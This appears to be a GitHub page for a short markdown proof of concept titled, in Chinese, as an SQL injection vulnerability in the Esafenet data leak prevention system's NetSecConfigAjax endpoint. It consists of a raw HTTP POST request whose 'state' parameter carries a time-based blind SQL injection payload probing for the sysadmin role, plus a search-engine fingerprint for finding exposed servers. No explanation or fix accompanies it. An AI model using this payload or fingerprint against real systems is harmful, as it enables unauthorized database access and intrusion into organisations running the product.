Skip to content

Latest commit

 

History

History
12 lines (9 loc) · 370 Bytes

亿赛通数据泄露防护(DLP)系统 NetSecConfigAjax SQL 注入漏洞.md

File metadata and controls

12 lines (9 loc) · 370 Bytes
POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1 
Host:
Content-Type: application/x-www-form-urlencoded

command=updateNetSec&state=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--
body="CDGServer3" || title="电子文档安全管理系统" || cert="esafenet" || body="/help/getEditionInfo.jsp" || body="/CDGServer3/index.jsp"